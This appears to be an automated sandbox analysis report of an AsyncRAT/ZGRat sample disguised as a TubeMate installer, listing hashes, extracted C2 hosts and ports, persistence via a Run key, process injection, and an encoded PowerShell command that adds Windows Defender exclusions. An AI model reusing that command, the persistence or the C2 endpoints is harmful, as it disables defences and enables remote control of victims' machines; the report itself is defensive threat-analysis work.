Analysis
-
max time kernel
144s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11-05-2024 21:01
Static task
static1
Behavioral task
behavioral1
Sample
645793d9e9330d225a3b3dfd20e20064.exe
Resource
win7-20240215-en
General
-
Target
645793d9e9330d225a3b3dfd20e20064.exe
-
Size
48.5MB
-
MD5
645793d9e9330d225a3b3dfd20e20064
-
SHA1
4344014c90b9a3ec79750998cdc5b68df983cd59
-
SHA256
3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0
-
SHA512
c8957f5fdf202f73e68d5e2397799f6f420b123df91743330e4d2495675c67e4d74a10e0030fb1c4d314dd1173a3b3c905db752f5d87600e8a8dcc18efb5297b
-
SSDEEP
1572864:Pwc6WzPrjxZFn1D0mNt1XhIEuX6LwkLXZwy:Z7BZd3f8uw
Malware Config
Extracted
asyncrat
0.5.8
Default
5512.sytes.net:6606
5512.sytes.net:7707
5512.sytes.net:8808
95.211.208.153:6606
95.211.208.153:7707
95.211.208.153:8808
Llg9a02PERRO
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral2/memory/1172-18-0x0000000005190000-0x00000000053B0000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-43-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-67-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-85-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-101-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-99-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-105-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-103-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-97-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-95-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-93-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-91-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-89-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-88-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-83-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-81-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-79-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-77-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-75-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-73-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-71-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-69-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-65-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-63-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-61-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-59-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-57-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-55-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-51-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-49-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-42-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-53-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-47-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 behavioral2/memory/1172-45-0x0000000005190000-0x00000000053AA000-memory.dmp family_zgrat_v1 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation 645793d9e9330d225a3b3dfd20e20064.exe -
Executes dropped EXE 3 IoCs
pid Process 1172 Dfzxuwcml.exe 4780 windows-tubemate-setup.exe 1652 windows-tubemate-setup.tmp -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kpteiazy = "C:\\Users\\Admin\\AppData\\Roaming\\Kpteiazy.exe" Dfzxuwcml.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1172 set thread context of 4512 1172 Dfzxuwcml.exe 87 -
pid Process 2644 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2644 powershell.exe 2644 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 1172 Dfzxuwcml.exe Token: SeDebugPrivilege 1172 Dfzxuwcml.exe Token: SeDebugPrivilege 4512 AppLaunch.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4084 wrote to memory of 2644 4084 645793d9e9330d225a3b3dfd20e20064.exe 80 PID 4084 wrote to memory of 2644 4084 645793d9e9330d225a3b3dfd20e20064.exe 80 PID 4084 wrote to memory of 2644 4084 645793d9e9330d225a3b3dfd20e20064.exe 80 PID 4084 wrote to memory of 1172 4084 645793d9e9330d225a3b3dfd20e20064.exe 82 PID 4084 wrote to memory of 1172 4084 645793d9e9330d225a3b3dfd20e20064.exe 82 PID 4084 wrote to memory of 1172 4084 645793d9e9330d225a3b3dfd20e20064.exe 82 PID 4084 wrote to memory of 4780 4084 645793d9e9330d225a3b3dfd20e20064.exe 83 PID 4084 wrote to memory of 4780 4084 645793d9e9330d225a3b3dfd20e20064.exe 83 PID 4084 wrote to memory of 4780 4084 645793d9e9330d225a3b3dfd20e20064.exe 83 PID 4780 wrote to memory of 1652 4780 windows-tubemate-setup.exe 84 PID 4780 wrote to memory of 1652 4780 windows-tubemate-setup.exe 84 PID 4780 wrote to memory of 1652 4780 windows-tubemate-setup.exe 84 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87 PID 1172 wrote to memory of 4512 1172 Dfzxuwcml.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\645793d9e9330d225a3b3dfd20e20064.exe"C:\Users\Admin\AppData\Local\Temp\645793d9e9330d225a3b3dfd20e20064.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbgBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAZABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeQByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdAB4ACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Users\Admin\AppData\Local\Dfzxuwcml.exe"C:\Users\Admin\AppData\Local\Dfzxuwcml.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\is-96H7F.tmp\windows-tubemate-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-96H7F.tmp\windows-tubemate-setup.tmp" /SL5="$100050,48138664,121344,C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"3⤵
- Executes dropped EXE
PID:1652
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5577b8f4cd65df6e3cd42d7d37c7917cf
SHA15033814e5aade04682bf7cb7fca3e32c46c5512a
SHA256d4360ef0464f7620fe0e3d5185adcdc0781aacfe23510d2c6c2e85c1095c8948
SHA512a42dab76abe41e53d7eee1ff3cec3092b26e1a05bdd6c91e8f12e35f6f14fc36df5ef918d0a2818d9f549db1e8ace169ff8ed3f441253a9a27b89c1ec816ff9d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD534acc2bdb45a9c436181426828c4cb49
SHA15adaa1ac822e6128b8d4b59a54d19901880452ae
SHA2569c81817acd4982632d8c7f1df3898fca1477577738184265d735f49fc5480f07
SHA512134ff4022571efd46f7a62e99b857ebe834e9916c786345908010f9e1fb90be226b740ddee16ae9290fe45c86be7238c4555e422abe66a461d11545e19734beb
-
Filesize
46.3MB
MD591d80adacf5e1e6686c209315197e4d1
SHA1381a7ae480e94829d1173593af2eec981d47863a
SHA256edf5656d1d254315ebe90b6365ee72f422cf64248da8cf885a9aa9dade46b824
SHA5129624bf5188c675a25635f23dfe38c886e1cd2be5f69f7bec360ffe8d467c5ecff2836906fe1a129b96a3ea26c91b9fc6149002af5c9dd62c603cbe9f5d2e121a